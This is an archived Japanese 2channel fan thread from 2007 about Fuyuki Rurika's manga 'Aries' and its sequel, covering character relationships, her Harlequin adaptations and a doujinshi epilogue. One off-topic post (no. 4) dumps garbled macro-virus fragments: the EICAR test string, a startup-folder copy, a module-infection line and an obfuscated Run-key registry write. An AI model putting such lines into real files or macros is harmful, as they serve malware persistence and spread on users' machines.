5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【アリーズ】冬木るりか 3

1 :花と名無しさん:2007/11/03(土) 19:51:49 ID:???0
冬木るりかスレです。 
代表作アリーズは勿論、その他の冬木作品も語り合いましょう! 

前スレ 
【アリーズ】冬木るりか 2
http://anime2.2ch.net/test/read.cgi/gcomic/1179665264/

過去スレ 
冬木るりか 
http://salad.2ch.net/gcomic/kako/975/975901054.html 
アリーズ(マイナーでスマソ!) 
http://comic.2ch.net/gcomic/kako/990/990033605.html 
冬木るりかと『アリーズ』を語ろう〜3 
http://comic.2ch.net/gcomic/kako/1033/10330/1033050382.html 
【アリーズ】冬木るりか 
http://anime2.2ch.net/test/read.cgi/gcomic/1158577397

2 :花と名無しさん:2007/11/03(土) 19:52:33 ID:???0
Wikiなど関連リンク

冬木るりか 
ttp://ja.wikipedia.org/wiki/%E5%86%AC%E6%9C%A8%E3%82%8B%E3%82%8A%E3%81%8B 

アリーズ 
ttp://ja.wikipedia.org/wiki/%E3%82%A2%E3%83%AA%E3%83%BC%E3%82%BA 

アリーズ2〜蘇る星座宮〜 
ttp://ja.wikipedia.org/wiki/%E3%82%A2%E3%83%AA%E3%83%BC%E3%82%BA2%EF%BD%9E%E8%98%87%E3%82%8B%E6%98%9F%E5%BA%A7%E5%AE%AE%EF%BD%9E 

3 :花と名無しさん:2007/11/03(土) 20:39:35 ID:???0
>>1
乙〜

現在、手に入るコミックスリストです↓↓


【既刊本】

●秋田書店
アリーズ文庫版――1・2巻 以下続刊(3・4巻は1月10日発売)
アリーズU――1・2巻 以下続刊

●宙出版
遠い絆(原作 ロビン・ドナルド)
青きフィヨルド(原作 ペニー・ジョーダン)

●ハーレクイン
御曹子の秘密(原作 ニコラ・マーシュ)
美しすぎる暗殺者 (原作 カリダード・ピニェイロ)

4 :花と名無しさん:2007/11/03(土) 21:46:35 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/11/03(土) 22:19:04 ID:???O
         *、 *、      。*゚    *-+。・+。-*。+。*
        / ゚+、 ゚+、   *゚ ・゚    \       。*゚
       ∩    *。  *。    +゚    ∩    *
   (´・ω・`)      +。   +。   ゚*     (´・ω・`)
   と   ノ      *゚  *゚    ・     。ヽ、  つ
    と、ノ     ・゚  ・゚     +゚    *  ヽ、 ⊃
     ~∪    *゚  *゚      *    +゚    ∪~   ☆
          +′ +′      +゚   ゚+。*。・+。-*。+。*゚

6 :花と名無しさん:2007/11/03(土) 22:54:54 ID:???0
>>1
スレ立て乙です

とうとう3ですねー
連載効果ですな

7 :花と名無しさん:2007/11/04(日) 02:11:20 ID:???0
ハデベルになりますように。
ラッキー7頂き!

8 :花と名無しさん:2007/11/04(日) 11:06:29 ID:???0
f


9 :花と名無しさん:2007/11/04(日) 19:13:52 ID:???O
>>1
乙でした。
来月まで長いね。

10 :花と名無しさん:2007/11/04(日) 21:04:57 ID:???0
>>5
GJ!

11 :花と名無しさん:2007/11/05(月) 13:16:12 ID:???0
>>1
乙。

雑誌買うの我慢してたが、バレ読んだら止まらなかった。
今は反省していない。

12 :花と名無しさん:2007/11/05(月) 17:41:50 ID:???0
アリーズUは二ヶ月に一回しか読めないからねー。
今月は姫金の発売も無いし…ってことで、とうとう手を出してしまいましたよHQ。
とりあえず店頭に置いてあった「遠い絆」と「美しすぎる暗殺者」読んでみました。
HQは初読みでしたが、私は結構大丈夫でしたね。
あんまり最初から、ストーリーに期待して無かったんで良かったのかも。
見所はやはり、冬木先生の描くイケメンが見られるってとこでしょうか…。
他の2冊もいつか取り寄せてしまうかも。
うちの近所はHQ置いてるとこ少ないんで、新刊で買わないと手に入りにくいんだよねー。

13 :花と名無しさん:2007/11/06(火) 19:28:36 ID:zIc9ICH/0
ハーレクインロマンスは、
ストーリーに期待してはいけません。
だって、完璧な起承転結でできてる…。
…しかーし、そのぶん、
漫画家さんの画力を純粋に楽しめます☆
でもでも、最近の…
ポセイドンとアンフィトリテの関係こそ、
何やら本当にハーレクイン的にセクシー!

14 :花と名無しさん:2007/11/07(水) 00:07:33 ID:???0
アリーズUを読んでて何となくHQっぽい感じを受けていたんですが、
冬木先生が描いたHQを読むと、それがよくわかりますね。
あぁ…こんなところもHQっぽい!…みたいなw

しかしポセとアンフィは無印の頃から言われていたけど、
旦那のほうが美人だねぇw
二人並ぶとどうしても旦那のほうが目立っちゃうっつーーさぁ…何だかなぁ

「美しすぎる暗殺者」のP14のエイダンは、
もうちょっと若くするとアリーズ初期の(自分の)ヘルメスイメージだなぁ
なんて思いながら読んでみましたよー

15 :花と名無しさん:2007/11/07(水) 10:17:29 ID:mEAppnlN0
同感です!
最近のポセイドンは…
前作にもまして華やかさアップ。
髪をなびかせて、更にゴージャス…。
ハデスを凌ぐ主人公ぶり…。
アンフィトリテと並ぶと、
まるで孔雀の雄と雌のような…。

16 :花と名無しさん:2007/11/07(水) 10:41:40 ID:???0
おいおい
孔雀のオスってハーレム作るんだぜww
まぁ野生動物は大概そうだけどな

17 :花と名無しさん:2007/11/07(水) 16:46:00 ID:???0
>>15
Uのポセは、血統書付きの長毛種(白)の猫っぽい感じがする
多分、髪型と目の印象がそうさせるのかも

それにしてもハデスはUになって地味になったなぁ
神代の記憶が無いからっていうのをさしひいても、地味だよなぁ
Tの頃は決してハデ好きではないが、存在感ありありだったのにー

18 :花と名無しさん:2007/11/07(水) 20:21:17 ID:???0
地味だけど可愛いと思ってしまう>ショウ

やっと雷鳴剣出てきたからもっと振り回して欲しいなあ

19 :花と名無しさん:2007/11/07(水) 21:06:32 ID:???0
>>18
確かにショウは可愛いんだよね
何ちゅうかこー母性本能に訴えてくる可愛さがあるんだよ
もっとショウの出番が増えないかしら

20 :花と名無しさん:2007/11/07(水) 22:48:32 ID:???0
昨日、アリーズ新連載を知って、コミックス1,2巻、文庫版も買ってきたよ

なんじゃあのヘカーテは?
もうテンパリすぎて、けなげさ通りl越して、ただのヤな女になっちまってる

ポセに、ハデスの前世の記憶いじれっていってたけど
アポロンが言うには、記憶の封印は絶対なんじゃなかったの?
それでいじってもしょうがないと思うんだが、実は封印解く方法知ってるとか

天野時代で、ベルの記憶封印がらみで、前世の記憶を取り戻すために
働いたヘカーテはどこいったんだ?
ハデスの幸せを願ってたんじゃないのかよ

これが想いまで一緒に転生しないってことなら、ちょっと悲しいよなぁ
ポセベル,アポベルは許容できそうだけど、ハデヘカだけは絶対ヤだ

21 :花と名無しさん:2007/11/07(水) 22:58:41 ID:???0
しかし、目標(欲望)に向かってぽじてぶに行動するキャラですわな。

別に今の時点で身を引く理由もないしねぇ。

22 :花と名無しさん:2007/11/07(水) 23:14:13 ID:???0
アリーズのときにはヘカーテわりと好きだったんだよね
でもUのヘカはどうにも好かんのですよ…ちょっとショックなん…orz

23 :花と名無しさん:2007/11/08(木) 10:10:25 ID:???0
Uのヘカーテは小粒なヤな女になっちゃってるよね。
HQじゃなく昼ドラノリのw
でもかわいそうだとも思う。ショウって「結婚するのはお前だ」
なんて言ってるけど「愛してるのはお前だ」とは言ってもらえてない。
前世云々差し引いても不安になるよ。ショウは一体何考えてんだか。
そもそも何故ヘカーテが婚約者になったんだろう…その辺が気になる。

>>20
あん時はヘカーテ自身死んじゃってたし、素直に幸せを願えたのかもよ?
あのヘカーテは物凄くよかった…。泣いた。

24 :花と名無しさん:2007/11/08(木) 10:15:35 ID:???0
>>23
父親同士が友人らしいから子供の頃から知ってるだろうし、その流れでの婚約なのかも。
それとショウは前世の記憶を封印されたときにヘカーテと結婚するように洗脳された可能性も。

25 :花と名無しさん:2007/11/08(木) 10:26:32 ID:???0
いわゆるハデスの幸せは自分と一緒じゃなきゃイヤ状態なんだよね、ヘカーテ
けど、今のままじゃ子供産もうが結婚しようが絶対幸せにはなれないと思うな

子供ネタを使った時点で、落ちぶれたなと思ったよ
1のヘカーテは好きだったのに

26 :花と名無しさん:2007/11/08(木) 11:21:00 ID:???0
>>25
>子供ネタを使った時点で、落ちぶれたなと思ったよ

そう…あのときは、まさか、まさか、お前アレ的なセリフを言う気じゃないよな
うわぁぁ!ダメダメダメダメーーーー!!って思った…
でも言っちゃったのねーん………orz



27 :花と名無しさん:2007/11/08(木) 13:26:54 ID:???O
子供ネタ使うほど余裕がないんだろうね>ヘカーテ
本来自分に心がないハデスを記憶を封じて捩曲げて自分のものにしたわけで
このままではヘカーテの心の平穏は来ないと思う

28 :花と名無しさん:2007/11/08(木) 21:48:57 ID:???0
まあこのまま単純にヤな女では終わらないと思うけど>ヘカーテ
Tでも冥界の門でのフォローがあったし。

ハデスを自分のものにしなくてはならない、と一番囚われてるのは彼女なのかもね。

29 :花と名無しさん:2007/11/08(木) 22:28:16 ID:???0
なんつーか、ヘカーテの子供ネタに対するハデスの対応が地味にショックだったり。
婚約してるんだから当たり前っちゃ当たり前なんだけど、手は出してたのね。
ハデスは記憶ないままベルセフォネーに惹かれ始めてるけど、真面目だから責任云々
いいそうな気がして悶える。こういう関係も昼ドラ的だね。

ベルセフォネーの幸せ的には寧ろポセイドンなんじゃないかと思うけれど、てかUの
ポセほんっとにいい男だからもったいないんだけど、アリーズ的にハデベルであって
欲しい……うーんどうなるんだろ。

30 :花と名無しさん:2007/11/09(金) 02:44:41 ID:???0
>>29
私はポセアンが有り得ないであろうという事になった時点から、
ポセベルでも良いと思うようになったよ
しかしUのポセとベルだと見た目が髪型とか似てたり(ウェーヴの長め)するので、
何となく兄妹っぽく見えるのねー…恋人っていうよりも…
実際今の関係がそっちっぽいから当たり前っちゃ、当たり前なんだけどさ

31 :花と名無しさん:2007/11/09(金) 09:33:29 ID:???0
ヘカーテがヤな女だなーって感じるのは
人をつかってアリサの邪魔をするからかなぁ。
ハデスの見えないところでアポロンに付いてみたり、クモの人をけしかけてみたり
ポセに取引を持ちかけてみたり(;´Д`)。
前作で美しく身を引いたときは感動したもんだけど
今回は必死すぎてみてて辛いよ(つД`)。
この子はほんとに幸せになれるんだろうか、と。


32 :花と名無しさん:2007/11/09(金) 12:46:17 ID:???0
自分がヘカーテがヤな女に見えるのは、記憶いじれとか封印とか
心とか記憶を一番軽んじているとこかな
それがアンタは欲しいのに、自分の都合がいいように扱ってるから

前世じゃ死の間際だったけど、自分ではハデスの心に
平穏を与えられないって悟ってたくせに

あと、親同士が友人とか手を出してるとかも、アポロンが封印と同時に
ヘカーテに都合がいいように記憶操作してんじゃないかと思う
それが契約条件だし

そういう風に思いたいハデベル至上主義の自分('A`)

33 :花と名無しさん:2007/11/09(金) 16:23:57 ID:???0
前作のヘラとくらべてしまう。
前作をリアルタイムで読んでたときは高校生で、
ヘラって執念深くて嫌いだったけど
いま読み返してみると直接手を出すところがいっそ潔いかも。
ゼウスマンセーだけど、それ以外ホントに興味がないんだなって。
だって、復活の乙女なのにヌッコロしたらゼウスは不利だよね。
同じ必死さでもヘカーテのそれとは違うなって思った。

と、こんなふうに思う三十路のオレがいるorz

34 :花と名無しさん:2007/11/09(金) 19:29:36 ID:???0
>>33
ヘラは終わりに近づくにつれて、人気が上がってきたキャラだったよね。
私は最初から好きだったけど。
アレスも同じ感じで最後のほうになって人気が出てきた。
なので、Uのヘカにもこれからを期待したいなーと思ってるけどね。

Tが終わったとき、主要キャラってほとんど皆良い人って感じで終わってるから、
Uで悪い役どころって本当に難しいと思う。
やっぱ旧作ファンとしては、えーーーっどうなっちゃったのぉ?っていうリアクションが
多いだろうし…もはや新キャラしか悪役は出来ないのでは…。
そう思うと(Tで出てきたけど)クロノスとか結構使えそうだったのになーと…。

35 :花と名無しさん:2007/11/09(金) 19:55:02 ID:???0
転生して前世と心が同じとは限らないって言ってた割には、
ヘカーテとヘルメスは立ち位置同じやなw

36 :花と名無しさん:2007/11/09(金) 20:04:51 ID:???0
ヘラとヘカーテの違いはそのままゼウスとハデスの違いでもあるんじゃないかな?
ゼウスは要するに諸星あたるだから、浮気もするがヘラも好き。
ハデスはケンシロウだから生きてようが死んでようがベルセフォネー一筋。他は眼中外。
だからヘラはゼウスを独占する為に他の女を排除するだけでいいけど、ヘカーテがハデスと
恋愛したければ、ベルセフォネーの存在自体完全に抹殺しないとどうにもならない。

ヘカーテのやり方は賛同できないけど、同情はするかな。
ヘラにとってのアレスみたいに、ヘカーテを一番に考えてくれる人がいればいいのにね。

37 :33:2007/11/09(金) 20:44:26 ID:Ime5/1yr0
>>34
私もヘラは後半は好きになったクチ。
エリスをハデスの所にやったりして、女神としてやはり考えが深いというか。
前半の過激さより一途さの中に見せるやさしさが目立つようになった。

>>36
だねえ。
自分はなんだかんだ言ってゼウスの正妻だし。
愛されてるから同じ必死でも余裕があるというか
ゼウスになだめられれば一応怒りはとけるっぽいし。
ハデベルが成立してヘカーテが幸せになるには、
ヘカーテが誰かに愛されれば何かに気がつくのかもとオモタ。
今のところアポロンに利用されてるし、ハデスは微妙だしかわいそうな役だ。




38 :33:2007/11/09(金) 20:56:08 ID:???0
と、書き忘れたので追記。
>>ヘラ
・・・前半の過激さより一途さの中に見せるやさしさが目立つようになった。 
その辺りでアレスやエリスに慕われてる理由がわかったよ。

今月は姫金でないね。
続きがきになるよー。

39 :花と名無しさん:2007/11/09(金) 23:43:15 ID:???0
>>36
ゼウス→あたる ハデス→ケンシロウ
面白い例え方だねー、よくあってると思う。

>>38
割とアレス・エリスだけでなく、ヘラは慕われてるっぽい感じがしたよね。
アイアリスもヘラ崇拝者だったし。

40 :花と名無しさん:2007/11/09(金) 23:54:36 ID:???0
>>32
私もそこが嫌だなあ

でもショウの勢いに「う…嘘だもの…」ってうろたえてたサヨコは無茶苦茶可愛かった

41 :花と名無しさん:2007/11/10(土) 00:46:41 ID:???0
手を握っただけでキャベツ畑から生まれると思ってないだろうな、ショウたん

42 :花と名無しさん:2007/11/10(土) 01:38:21 ID:???0
ショウはヘカーテのこと「自分もお嬢さん育ちだろ」とか言ってるけど、
婚約者でショウ家と家族ぐるみの付き合いっぽいのにヘカ両親とか出てこないねえ。
>>32の言うような記憶操作、アリかも。

そしてあたるとケンシロウに、たとえが上手すぎてふいたw

43 :花と名無しさん:2007/11/10(土) 18:43:48 ID:???0
記憶をもてあそばれるショウタン…カワイソス…。・゚(´Д⊂ヽ

44 :花と名無しさん:2007/11/11(日) 02:26:08 ID:???O
ハデス→ケンシロウを想像したら、

アータタタタタタッ!!!
「お前はもう死んでいる」

と言っているハデスが脳裏に焼き付いて消えなくなった…orz


45 :花と名無しさん:2007/11/11(日) 05:32:13 ID:???0
>>44
想像したらあんまり違和感無くて吹いた。

それでもいいからハデスに出てきて欲しいじょ〜〜〜!

46 :花と名無しさん:2007/11/11(日) 08:26:30 ID:???O
今更ながらアリーズの文庫買って読んだ

やっぱこの人とは相性いいよ
やはり自分好みのだ…

47 :花と名無しさん:2007/11/11(日) 18:33:00 ID:7KuKs9md0
ハーレクイン「青きフィヨルド」のブレット君は、
ハデスのソックリさんです。
今のハデスが、あと数年年くったら…
まあ、こんな感じでしょう!
冬木氏のハーレクインは、
ヒーローもヒロインもみーんな…
アリーズキャラの数年後を思わせるルックス…。

48 :花と名無しさん:2007/11/12(月) 01:03:46 ID:???0
>>47
えーっ!ハデス似のキャラですとーーー!
それは一度見てみたいかも…
青きフィヨルドお取り寄せかしらw

49 :花と名無しさん:2007/11/12(月) 15:00:19 ID:???0
前作の17歳天野よりも、今作の18歳ショウのが年下に見えるなー。

50 :花と名無しさん:2007/11/12(月) 17:44:44 ID:XBglyYnY0
同感です!
前作の翔君…
なんだか、必要以上に老けてましたもの…。
 ハデス   高校生。
 ポセイドン 大学生。
この設定が、未だに不思議なくらい、
老成してましたねぇ、彼。
口調もヤンキーでしたが…。

51 :花と名無しさん:2007/11/12(月) 17:53:04 ID:???0
日本人の高校生としての意識は全く失っていて、神代の人格そのままだったから
老成していたんだろう。

二度目の転生では前世の日本人だった頃の記憶も持っているみたいだけど
例えば天寿を全うしたとして八十歳頃の記憶とかそれまでの人生経験すべてを
思い出すんだろうか??それともあの前世では皆早死にしてしまって
「やりのこしたこと」が出来てしまったんだろうか?

これから先の展開でそんな話も出てくるかな。

52 :花と名無しさん:2007/11/12(月) 20:27:36 ID:???0
自分たちの子供の子孫とかは気にならないのかな?

53 :花と名無しさん:2007/11/12(月) 22:01:48 ID:???0
>>51
80歳のハデス。見たいような見たくないような……。

54 :花と名無しさん:2007/11/12(月) 22:08:12 ID:???0
神代の力はあっても姿をとどめる力は戻らないのか…

55 :花と名無しさん:2007/11/12(月) 22:20:22 ID:???0
>>53
天野父もレイファン父も渋いので問題ない
かっこいい爺になるにちがいない

56 :花と名無しさん:2007/11/12(月) 23:44:45 ID:???0
>>55
しかしジジハデは見たくないのだった(乙女心)☆

57 :花と名無しさん:2007/11/13(火) 02:41:05 ID:???0
>>51
>八十歳頃の記憶とかそれまでの人生経験すべてを思い出すんだろうか??

それは是非やって欲しい。
Tではゼウス倒してあっさり最終回だったので寂しかった自分…。
日本に帰ってからラブってる二人とか、
いきなり数年後に話飛んでもいいから結婚して幸せに暮らしてるハデベルとか
そういう後日談も読みたかった。
オリンポス側で一人生き残ったヘルメスはどうするんだろうなーとか
一条家はポセが死亡(つーか行方不明扱いなのか?)で大変なんだろうかとか
当時高校生だった自分は脳内で悶々としていたw

58 :花と名無しさん:2007/11/13(火) 09:15:36 ID:???0
>>57
自分もこの後ヘルメスは余生をどう生きるんだろうと思ったよ。
ゼウスもエリスも失ってさ…ヒッキーか?

59 :花と名無しさん:2007/11/13(火) 12:43:30 ID:???0
>>58
ストーカーになりそう・・・

60 :花と名無しさん:2007/11/13(火) 17:51:05 ID:???0
>58 59
でも敵味方に分かれたとはいえ、一番仲の良いアポロンが残ったから心配はなかったな。
戦いが終わった後にアポロンがヘルメスに駆け寄って行っていたし。
アポロンが慰める事も兼ねて(アポロン自身もゼウスが死んだのは悲しいし)、
ヘルメスを引っ張りまわし、連れまわしするんだろうなって思ったよ。


61 :花と名無しさん:2007/11/13(火) 19:58:24 ID:???0
>>60
じゃあその辺のことが、Uに繋がってるのかなー?

どっちにしろTの転生時の経験が関わってるっぽいね。
セイレーンとかアイアリスの言動を考えると。

62 :花と名無しさん:2007/11/13(火) 23:00:10 ID:???0
実は後日談知ってる。本人が出した外伝同人誌を読んだ事がある。
ヘルメスはアポロンの秘書みたいな事をしていて、ハデベルは結婚して子供がいるらしかった。

63 :花と名無しさん:2007/11/13(火) 23:35:13 ID:???0
>>62
>ヘルメスはアポロンの秘書みたいな事をしていて(以下省略)

まんまUですなw

そういえばTの終わりの方で、ゼウスが倒れた後だったか、アポロン複雑そうな顔してなかったっけ?
あれ見たとき、可愛がってくれてたゼウスが死んで悲しいとかいうのもあったかもしれないけど、
それ以外の感情も持ったんじゃないかと思ったんだよねー。
だからUでアポがゼウス二号的立ち位置で登場したとき、あんまり違和感は無かったんだよな。
ある意味しっくりきた感じで。

64 :花と名無しさん:2007/11/15(木) 07:53:07 ID:???0
連載終了当時、同人誌ってものを全く知らなくて、数年後その存在を知ったときから
そんなのメサイアハーフみたく、コミックスに載せてくれーと本気でヘコんだorz

プロメテウスのこととか、ベルの記憶が戻った後も翔と亜里沙の痴話ゲンカ顕在なのか
知りたいことあったらから(載ってなくてもいいから)読みたかった

文庫版で入らないかな

65 :花と名無しさん:2007/11/15(木) 08:48:45 ID:???O
>>64
私もー。ノシ
アリーズが文庫化するって聞いたときからPSアリーズ収録して欲しいと思ってた。
最終巻のラストに入れてくれないかな…マジで。

66 :花と名無しさん:2007/11/15(木) 09:12:15 ID:???0
>>64
私は冬木先生がイベントに出るっていうんで、行きたかったけど行けなかったくち。
連載当時あったサイン会も行けなくて、本当に悲しかったよ。
おまけにその時に取った資格は役にたってません………すっぽかせば良かったorz

67 :花と名無しさん:2007/11/15(木) 13:00:08 ID:???0
みんな、先生にお手紙を書くんだ!!

68 :花と名無しさん:2007/11/15(木) 13:44:09 ID:???O
先生というより秋田にメールだ!!

69 :花と名無しさん:2007/11/15(木) 14:37:13 ID:???0
秋田はやる気ないでしょ
書店にコーナーないって売る気あんの?と思う

70 :花と名無しさん:2007/11/15(木) 14:37:36 ID:???O
>>68
PSは冬木さん個人の同人本だから秋田じゃ駄目だと思う。
やはり、ここは冬木さんご本人に手紙書くしかないか?

71 :花と名無しさん:2007/11/15(木) 21:41:27 ID:???0
隣町の宮脇書店に、冬木さんのハーレクインの
エッセイマンガ?付ポップが貼ってあった。
あれって宮脇だけなのかな?

72 :62:2007/11/15(木) 22:00:41 ID:???0
同人誌の事、意外と知られてないのね。内容うpできればいいけど自分の所持品じゃないからなー。
同人誌だから、やはり先生本人に手紙で再版希望してみないと手に入らないかもね。

知りたいって人の為に以下軽くネタバレします。
知りたくない人は避けて下さい。





同人誌で先生の原稿は
1。神話時代、小学生くらいのハデス達のところに生まれてまもないポセイドンがくる。
  乳母のクリュメネーに育てられていた頃の話。
2。1の連載時、ポセイドンがイルカ贈ったのにアンフィトリテに振られてその後(その夜?)
  ヤケ酒飲んでハデスに八つ当たりに来る話。
3。1の後日談。アポロンが大人になってヘルメスと一緒に女医になったアルテミスを訪ねる。
  プロメテウスのその後の話。
あとは当時のアシスタントや漫画家の人達が寄稿してて、企画ページがちょっとあった。
マンガはハデスは出てくるもベルセフォネーは出てこず。主人公だと語り尽くしたのかも。

73 :花と名無しさん:2007/11/15(木) 22:08:43 ID:???0
うpしてくれてるサイトがあるんだけどまだお願いはしてない…

>>72
2がみてぇぇぇ〜wwww

74 :花と名無しさん:2007/11/16(金) 08:55:10 ID:???0
同人誌持ってた持ってたww。
引っ越すんで、この間思い切って捨てちゃったけどなww

75 :花と名無しさん:2007/11/16(金) 11:31:11 ID:???0
>>74
うはーーーー
もったいなーーーい、欲しい人いただろうに…

76 :花と名無しさん:2007/11/16(金) 12:52:38 ID:???0
>>75
だろうと思う。このスレ見てたらそう思った。

いやーもー古かったし中古でも取り扱ってる店とかあった気が
するから別にわざわざ売りに行かんでもいらんだろーと、
捨てた時は面倒くさくてそう思ってたんだ。
今はどうかは知らんが昔、冬木女史はイベントに出まくってたし、
持ってる人なんざ多いだろーと思い込んでるあたり安直すぐる。
反省汁自分。

77 :花と名無しさん:2007/11/16(金) 17:12:55 ID:SvlPBvUr0
知らなかった…!
アルテミス、女医さんになったのねぇ。
納得です。
精神的にアポロンよりも、
ずーっと、お姉ちゃんでしたからね。
気になるのは、アポロンのその後です。
あの、お子ちゃまが、
どうやったらハーレクイン風紳士に成長したのか?
今作、最大の謎です。

78 :花と名無しさん:2007/11/17(土) 07:27:08 ID:???0
>>77
>ハーレクイン風紳士

的確な表現でうけましたw
確かにUがハーレクイン臭がするのはアポが最大の原因だと思いますw
しかし顔が良いのですべて許しますww

79 :花と名無しさん:2007/11/17(土) 08:54:44 ID:???0
>>77
>ハーレクイン風紳士

そう!
IIで一番驚いたのがそれだ
アンフィの母転生も驚いたけど、ポセの術が通じないくらい成長して
何があったのかワクワクするよ

でも、アポってやっぱりポセのこと嫌いなのね
前世で一緒に戦ったし、少しは打ち解けあえたかなと思ってから

80 :花と名無しさん:2007/11/17(土) 10:00:05 ID:???0
現代は「お兄ちゃんとすぐ下の弟」みたいな感じだったのにね。
大好きじゃないけど嫌いじゃないって感じだと思ってた。

アポロンこそ何かに操られたりとかしてるんじゃないかなぁ。
アリサに助けを求めてたりして。

81 :花と名無しさん:2007/11/18(日) 14:37:00 ID:???0
アポロンがあれだけ出てくるのならアルテミスもいずれ出てくると思うけど、
どんな役回りになるのかなあ。
アポロンがあのままだと、1の後半みたいに一緒に居るのは難しい気がする。

82 :花と名無しさん:2007/11/18(日) 15:54:34 ID:???0
>>81
できれば今回はアルテミスにはアポロンの側にいてあげて欲しいけどね。
まぁいずれ兄弟(妹)は仲良くっても別々の道に進まなければいけない日がくるのは当然なんで、
今回もそれぞれの選んだ別の道に進んでも仕方ないね。
アポロンもヘルメスや妹に心配かけてばかりいないで、
そろそろ独り立ちしないとな。

83 :花と名無しさん:2007/11/18(日) 16:20:46 ID:???0
実は1の時のアルテミスとポセイドンの関係が結構好きだった。
もちろん恋愛の相手としてはなくね。
ポセイドンはアポロンに対しては色々と思うところがあって厳しいけど、
アルテミスに対しては割と優しくて、まさに「親戚のお兄さん」の様だった気がする。

84 :花と名無しさん:2007/11/18(日) 18:24:42 ID:???0
>>83
>「親戚のお兄さん」

神代では本当に伯父さんだったわけだしなw
アポがポセを嫌いなのはアルテミスが関係あったりしてね。
アルテミスは僕だけのものなんだからぁ〜!…みたいなw
あとはゼウスの血がポセを本能的レベルでキライとか?

85 :花と名無しさん:2007/11/19(月) 15:45:11 ID:???O
アポとポセの微妙な空気は同族嫌悪なのかと思ってた。
いや、外伝の幼いポセがアポに似ていたものだからさー。


86 :花と名無しさん:2007/11/19(月) 21:22:58 ID:KpA0pKsj0
>>85
1のアポロンは同族だと気付いてなさそう
単に厳しくて容赦ないからこわーいみたいな感じっぽい

87 :花と名無しさん:2007/11/19(月) 22:43:47 ID:???0
>>86
アポは自分に優しい人は好き、自分に厳しい人は嫌いっていう単純なところがあったからねー。
ちっちゃかったから無邪気で済んでただけで、嫌いな人には本当に容赦しないよな。
無印ではアレスも結構アポにやられてたし。
Uではでかくなってる分、その辺もパワーアップしてそうだな。
アンフィも重傷負わされたし。

88 :花と名無しさん:2007/11/19(月) 23:35:58 ID:???0
すると、場合によってはその容赦のなさをベルに対して発揮するかもしれんな。
かわいさ余って憎さ百倍。

89 :花と名無しさん:2007/11/20(火) 10:32:37 ID:???0
>>88
早くもハデスには向けてるしね。
仮にもTでは一緒に戦ったのにさ。
それって間接的にベルにも容赦なしってことじゃない?
ベルの大事な人(ハデス)でも必要なら…みたいな。

90 :花と名無しさん:2007/11/20(火) 12:59:11 ID:???0
>>88
アンフィに続いてアリサまでそんなことになったらポセが怒り狂いそうだ。

91 :花と名無しさん:2007/11/20(火) 15:41:49 ID:???0
>>90
ポセとアポ…どこまでも仲悪しだなw

92 :花と名無しさん:2007/11/23(金) 01:55:24 ID:???0
力の強さは
 アポ>ポセ だけど
 幽体離脱ハデ>アポ なの?

アポロンが「時代は僕たち新世代の神」とかいうわりに
アッサリ負けてたので、なんだかなーという感じ。
つか、新世代ってそんなに人数いないじゃん…。
ヘルメスよりヘカーテのが強そうだ。

93 :花と名無しさん:2007/11/23(金) 13:51:48 ID:???0
>>92
やっぱ神代の神が一番力が強いのはしかたないんじゃね?
何でアポ>ポセなのかは今のとこハッキリしないけど。
ヘルメスはヘカーテやポセイドンより確実に弱そうなのは同意w
時代は新世代の神のもの…っていうなら、もっと神世代に出てきて欲しいものだけど。
Tではゼウス側についている神が多すぎてパワーバランス的にどうなのかと思ったこともあったけど、
Uではアポ側の戦力が弱すぎる感があるんでね。

94 :花と名無しさん:2007/11/23(金) 15:29:49 ID:???0
>>93
>もっと神世代に出てきてほしい(誤
       ↓
 もっと新世代に出てきてほしい(正

すみません訂正です

95 :花と名無しさん:2007/11/25(日) 19:50:48 ID:nrhsHHeC0
同感です。
もっともっと、新キャラに出場してほしい!
せめて、オリンポス12神くらいは、出てこなくては…
物足りないというものです。
まずは、ヘラ様から…といいたいですが、
きっとハーレクインに登場する、
ヒロインのライバル美女風でしょうねえ、たぶん。

96 :花と名無しさん:2007/11/25(日) 20:34:09 ID:???0
ゼウスやヘラなどは、今頃どてらを着て縁側で梅昆布茶すすりながら
膝に猫抱いてまったりしてるのに忙しくて
アリーズ2に出演する暇は無さげな予感。

97 :花と名無しさん:2007/11/25(日) 23:46:59 ID:???0
緑KY

98 :花と名無しさん:2007/11/26(月) 12:22:36 ID:???O
>>96
吹いたw
確かに登場しても全く覇権に興味ないって展開もありえるな

99 :花と名無しさん:2007/11/26(月) 14:52:33 ID:???O
時代は新世代のものってアポが言ってるので、親世代の出番は少ないと思われ・・・
アポらと同じ子供世代は、出番あるかも?


100 :花と名無しさん:2007/11/27(火) 13:26:04 ID:???O
子供世代で前作登場して今作まだの神というと
アレス
アテナ
エリス
アルテミス
こんなところ?

101 :花と名無しさん:2007/11/27(火) 20:36:15 ID:???0
プロメテウス

102 :花と名無しさん:2007/11/27(火) 20:37:21 ID:???0
あ、子供世代か。アルテミスのダンナは違うな。

103 :花と名無しさん:2007/11/28(水) 00:33:48 ID:???O
子供世代の神ってアポ側につきそうなキャラっていなそうだけど、そのへんは前世と一緒とは限らない・・・でのりきるのだろうか・・・?

104 :花と名無しさん:2007/11/28(水) 01:02:23 ID:???0
>>102
実はアルテミス、アポロンの叔母とかでもう子供がいたりしてね
以前よりシビアな関係で転生することもあるみたいだし、そういうのもあるかも知れない

105 :花と名無しさん:2007/11/28(水) 10:53:29 ID:???0
